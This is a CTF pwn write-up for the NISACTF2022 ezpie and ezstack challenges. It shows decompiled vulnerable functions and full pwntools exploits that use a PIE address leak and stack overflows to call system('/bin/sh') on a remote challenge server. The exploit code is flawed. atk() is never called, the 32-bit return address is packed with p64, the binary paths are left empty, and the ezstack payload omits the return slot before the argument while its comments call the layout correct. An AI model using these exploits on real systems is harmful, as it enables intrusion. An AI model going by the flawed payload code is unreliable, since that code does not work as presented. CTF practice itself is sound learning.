pwn - write ups

[NISACTF2022]ezpie

  • checksec
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
OHHH!,give you a gift!
0x56573770
Input:
  • main
// main (ezpie): disables stdio buffering, prints the runtime address of main
// with printf("%p"), then hands input to vuln(). Because the binary is PIE
// (see checksec), this printed address is the leak the rest of the write-up
// uses to compute the load offset.
int __cdecl main(int argc, const char **argv, const char **envp) {
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  puts(OHHH!,give you a gift!);
  printf(%p\n, main);  // leaks main's runtime (PIE-relocated) address
  puts(Input:);
  vuln();
  return 0;
}
  • vuln
// vuln (ezpie): reads up to 0x50 bytes into a buffer located at ebp-0x28.
// The read length exceeds the buffer by 0x28 bytes, so it can overwrite the
// saved ebp and the return address (no stack canary per checksec).
// Decompiler output: `char buf` stands for the whole 0x28-byte region.
ssize_t vuln() {
  char buf; // [esp+0h] [ebp-28h]
  return read(0, &buf, 0x50u);  // 0x50 > 0x28: stack overflow
}

vuln() 中存在栈溢出

已知程序会输出main地址

程序中 main 函数的静态地址为 0x00000770,则

main_addr = int(io.recvline(),16)  # runtime address of main, as printed by the binary
offset = main_addr - main_add  # PIE load offset; main_add is the static symbol address (elf.sym['main'])

接收程序输出的main函数地址,减去静态地址算出offset

  • shell
// shell (ezpie): not called from main (main only calls vuln()); runs
// system("/bin/sh"). Its static symbol address is what the write-up relocates
// by the PIE offset.
int shell() {
  return system(/bin/sh);
}

获取 shell 函数的地址

bin_sh = elf.sym['shell']  # static (pre-relocation) address of the shell() function, not a "/bin/sh" string

加上offset,得bin_sh_final

bin_sh_final = offset + bin_sh  # relocate shell() by the PIE load offset

完整exp

from pwn import *

context(os = 'linux' , arch = 'i386' , log_level = 'debug')

# content selects the target: 0 = the remote challenge service, anything else = a local process.
content = 0
if content == 0:
    io = remote('124.221.24.137',28638)
else:
    io = process('')


def atk():
    """ezpie flow: read the leaked main address, derive the PIE offset, return into shell().

    NOTE(review): atk() is defined but never called in the listing as shown.
    """
    elf = ELF('')  # NOTE: binary path is left empty in the write-up; must name the challenge ELF
    padlength = 0x28 +0x4  # buf at ebp-0x28 plus saved ebp, reaching the return address
    bin_sh = elf.sym['shell']  # static address of shell(); the name is misleading (it is a function, not a string)
    io.recvuntil('OHHH!,give you a gift!\n')
    main_addr = int(io.recvline(),16)  # runtime address printed by main()
    success('[+]main_addr=' + hex(main_addr))
    main_add = elf.sym['main']  # static address of main (0x770 per the write-up)
    offset = main_addr - main_add  # PIE load offset
    success('[+]offset=' + hex(offset))
    io.recvuntil('Input:\n')
    success('[+]bin_sh=' + hex(bin_sh))
    bin_sh_final = offset + bin_sh  # relocated address of shell()
    success('[+]bin_sh_final='+hex(bin_sh_final))
    # NOTE(review): arch is i386 (see context above) and the ezstack exp uses p32;
    # p64 here emits 8 bytes, i.e. four extra zero bytes past the 4-byte return slot.
    payload = b'a' * padlength + p64(bin_sh_final)
    io.sendline(payload)
    io.interactive()

[NISACTF2022]ezstack

  • main
// main (ezstack): disables stdio buffering and calls shell() directly.
int __cdecl main(int argc, const char **argv, const char **envp) {
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  shell();
  return 0;
}
  • shell
// shell (ezstack): prints a banner through system(), then reads up to 0x60
// bytes into a buffer at ebp-0x48 — 0x18 bytes past the buffer, enough to
// overwrite the saved ebp and the return address. The system() call also
// means the symbol is already present in the binary (the exp reads it via
// elf.sym['system']).
ssize_t shell() {
  char buf; // [esp+0h] [ebp-48h]
  system(echo Welcome to NISACTF);
  return read(0, &buf, 0x60u);  // 0x60 > 0x48: stack overflow
}

shell 函数中存在栈溢出

完整exp

from pwn import *

elf = ELF('')  # NOTE: binary path is left empty in the write-up; must name the challenge ELF
# io = process('')
io = remote('124.221.24.137',28760)
padlength = 0x48 + 0x4  # buf at ebp-0x48 plus saved ebp, reaching the return address
bin_sh = next(elf.search(b'/bin/sh'))  # address of a "/bin/sh" string found inside the binary
system = elf.sym['system']  # address of system; the binary already calls it from shell()
success('[+]bin_sh=' + hex(bin_sh))
success('[+]system=' + hex(system))
shell = elf.sym['shell']  # logged only; not used in the payload below
success('[+]shell=' + hex(shell))
# Payload layout: padding up to the return address, then the system address,
# then the "/bin/sh" pointer immediately after it (no separate dword between them).
# NOTE(review): no PIE offset is applied here, unlike ezpie — checksec output for
# this binary is not shown, so confirm it is non-PIE.
payload = b'a' * padlength + p32(system) + p32(bin_sh)
io.sendline(payload)
io.interactive()